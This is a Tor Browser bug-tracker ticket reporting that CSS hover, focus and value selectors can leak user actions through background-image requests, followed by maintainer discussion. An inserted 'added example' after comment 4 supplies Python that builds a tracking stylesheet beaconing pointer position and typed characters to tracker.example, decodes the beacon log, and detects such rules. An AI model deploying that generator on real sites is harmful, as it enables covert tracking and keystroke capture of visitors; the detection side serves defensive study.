Opened 4 months ago

Last modified 3 months ago

#30392 new defect

CSS features allow real-time tracking

Reported by: davywtf
Owned by: tbb-team
Priority: Medium
Milestone:
Component: Applications/Tor Browser
Version:
Severity: Normal
Keywords:
Cc: ehsan.akhgari@…
Actual Points:
Parent ID:
Points:
Reviewer:
Sponsor:

Description

CSS features like :hover, :focus, and [value] queries in combination with background image changes allow for the collection of nearly every action a visitor makes on a web page in real-time without JavaScript. Aside from the obvious creep factor this could be used to fingerprint visitors. The attack can be implemented in third party CSS (CSS-XSS).

Proof of Concept: https://twitter.com/davywtf/status/1124146339259002881
Code for proof: https://gist.github.com/wybiral/c8f46fdf1fc558d631b55de3a0267771

Beyond simply fingerprinting based on browsing behavior an attacker could also determine the referring page based on the mouse position at page load.

Solutions to fix the problem would break some aesthetic functionality (i.e. no more :hover image changes) but at that cost it would be trivial to prevent.

Ideally we could eliminate all types of asset requests (e.g. image changes) in all types of pseudo-class selectors or prefetch all asset requests on page load. But that proposal sounds bigger than Tor Browser.

Child Tickets

Change History (5)

comment:1 Changed 4 months ago by Crissy2

By default, if "display:none" is set on a descendant element and:

```css
affectedElement > div {
  display: none;
  background: ...; /* image URL elided in the original comment */
}

affectedElement:hover > div,
affectedElement:focus > div {
  display: block;
}
```

and you hover it, the background will be loaded on hovering... but it is used in all popup menus.

So it is not trivial to prevent it.

To prevent it, there should be a button to clear all cookies / data associated with the current website, that closes the website and then clears cookies. Still not working in TBB :/

Last edited 4 months ago by Crissy2

comment:2 Changed 4 months ago by gk

Keywords: css removed
Status: new → needs_information
Version: Tor: unspecified

So, what exactly is the threat here? We don't spoof referers unless you come from a .onion domain and go to a non .onion one. And I am not sure I understand the fingerprinting concern. You mean the website you are interacting with is recognizing you once you come back? If so, how so if _only_ CSS is available (moreover, tracking by first-party domain is currently out of scope; if that's done by identifiers like cookies then New Identity is your friend given that not only cookies but numerous state has to get cleared to separate those visits).

comment:3 Changed 4 months ago by gk

Cc: ehsan.akhgari@… added

#30347 is a duplicate. (See comment:2, where I'm still trying to figure out what exactly the tracking vector is.)

comment:4 Changed 3 months ago by davywtf

Tracking in the sense that it can be used to fingerprint users based on behavior that's hard for the user to hide. And the user may be completely unaware that it's happening since they typically don't assume metrics are being collected on static pages with NoScript.

To give you some ideas:

  • Based on motion you can determine mouse vs touchpad vs keyboard navigation
  • If research into gait analysis translates you should be able to predict biometrics (arm dimensions) from mouse movement
  • Reveals screen visibility (scroll location, window dimensions, etc)

So it's not a major threat in the sense that it's directly identifying a user or their machine (unless those metrics are already known) but it's a potential fingerprinting data point that could be mitigated entirely by preloading content linked from CSS. And the future of online tracking and privacy violation will almost certainly involve basic machine learning approaches applied to seemingly innocuous user input like this.
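The mechanism behind the ticket, as an added example that is not the reporter's PoC, the linked gist, or Tor Browser code: a server-side generator for the kind of stylesheet the description talks about (a :hover cell grid plus [value] selectors, each pointing at a distinct background-image URL), a parser that turns the beacon host's access log back into pointer and keystroke events (the first pointer event being the "position at page load" from the description), and the defensive scan a reviewer of third-party CSS would run, which also catches the hidden-child/display:block variant from comment:1. The tracker hostname, element ids (#grid, #c<x>_<y>, #q), beacon paths (/m/x/y, /k/input/char), the log lines and the menu stylesheet are all constructed for this example.

```python
"""CSS-only interaction beacons: build, decode, and detect (added example)."""
import re

BEACON_HOST = "https://tracker.example"  # constructed, not from the ticket

# Selector state that only applies after user interaction.
STATE_RE = re.compile(r":(focus-within|hover|focus|active|checked)|\[value", re.I)
# Crude rule splitter; enough for flat stylesheets without nested blocks.
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}")


def build_tracking_css(cols=4, rows=3, cell_px=100, input_id="q", alphabet="abc"):
    """Stylesheet that reports pointer position and typed characters without JS.

    Assumes the page carries <div id="grid"> with cols*rows children whose ids
    are c<x>_<y>, plus an input with id input_id (all assumed). A background
    image is fetched only once its rule applies, so each request is one event."""
    rules = [
        "#grid{position:fixed;top:0;left:0;display:grid;"
        f"grid-template-columns:repeat({cols},{cell_px}px);grid-auto-rows:{cell_px}px}}"
    ]
    for y in range(rows):
        for x in range(cols):
            # Hovering cell (x, y) makes the browser GET /m/x/y.
            rules.append(f"#c{x}_{y}:hover{{background-image:url({BEACON_HOST}/m/{x}/{y})}}")
    for ch in alphabet:
        # Fires only where the value *attribute* mirrors the typed text (e.g.
        # frameworks that sync it); a plain input does not update the attribute.
        rules.append(f'#{input_id}[value$="{ch}"]'
                     f"{{background-image:url({BEACON_HOST}/k/{input_id}/{ch})}}")
    return "\n".join(rules)


def parse_beacon_log(lines):
    """Rebuild the event stream from the beacon host's access log.

    Returns ("move", x, y) for /m/x/y and ("key", input_id, char) for
    /k/input_id/char; anything else (favicons, crawlers) is dropped."""
    events = []
    for line in lines:
        m = re.search(r'"GET (/\S*) HTTP/', line)
        if not m:
            continue
        parts = m.group(1).strip("/").split("/")
        if len(parts) == 3 and parts[0] == "m" and parts[1].isdigit() and parts[2].isdigit():
            events.append(("move", int(parts[1]), int(parts[2])))
        elif len(parts) == 3 and parts[0] == "k":
            events.append(("key", parts[1], parts[2]))
    return events


def position_at_load(events):
    """First pointer cell seen after load: where the referring click landed."""
    return next(((x, y) for kind, x, y in events if kind == "move"), None)


def _squash(selector):
    return re.sub(r"\s+", "", selector)


def find_state_dependent_asset_rules(css):
    """Flag rules whose asset request depends on interaction state.

    Direct form:   a:hover { background-image: url(...) }
    Indirect form (comment:1): a > div { display:none; background:url(...) }
                               a:hover > div { display:block }"""
    rules = [(sel.strip(), body) for sel, body in RULE_RE.findall(css)]
    findings, hidden_with_asset = [], set()
    for sel, body in rules:
        if "url(" not in body:
            continue
        if STATE_RE.search(sel):
            findings.append(("direct", sel))
        if re.search(r"display\s*:\s*none", body):
            hidden_with_asset.update(_squash(p) for p in sel.split(","))
    for sel, body in rules:
        if not STATE_RE.search(sel) or not re.search(r"display\s*:\s*(?!\s*none)", body):
            continue
        for part in sel.split(","):
            if _squash(STATE_RE.sub("", part)) in hidden_with_asset:
                findings.append(("indirect", part.strip()))
    return findings


# Constructed Common Log Format lines from the beacon host.
SAMPLE_LOG = [
    '10.0.0.7 - - [01/May/2019:12:00:00 +0000] "GET /m/2/1 HTTP/1.1" 200 43',
    '10.0.0.7 - - [01/May/2019:12:00:01 +0000] "GET /m/3/1 HTTP/1.1" 200 43',
    '10.0.0.7 - - [01/May/2019:12:00:02 +0000] "GET /k/q/a HTTP/1.1" 200 43',
    '10.0.0.7 - - [01/May/2019:12:00:03 +0000] "GET /favicon.ico HTTP/1.1" 404 0',
]

# The popup-menu pattern from comment:1, with a constructed image URL.
MENU_CSS = """
affectedElement>div{display:none;background:url(https://tracker.example/menu.png)}
affectedElement:hover>div,affectedElement:focus>div{display:block}
"""

if __name__ == "__main__":
    events = parse_beacon_log(SAMPLE_LOG)
    print("events:", events)
    print("pointer at load:", position_at_load(events))
    for kind, sel in find_state_dependent_asset_rules(MENU_CSS):
        print(f"{kind}: {sel}")
```

The scan is what the comment-1 exchange implies a page-side mitigation has to cope with: a rule that only references url() under :hover is easy to flag, but the menu pattern carries the url() on an always-present hidden child and only toggles display, so a scanner has to pair the hidden rule with the state rule that reveals it. Neither check distinguishes a legitimate rollover from a beacon; that is exactly why the ticket's proposed browser-side fix is to prefetch everything a stylesheet references rather than to judge individual rules.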

comment:5 Changed 3 months ago by gk

Status: needs_information → new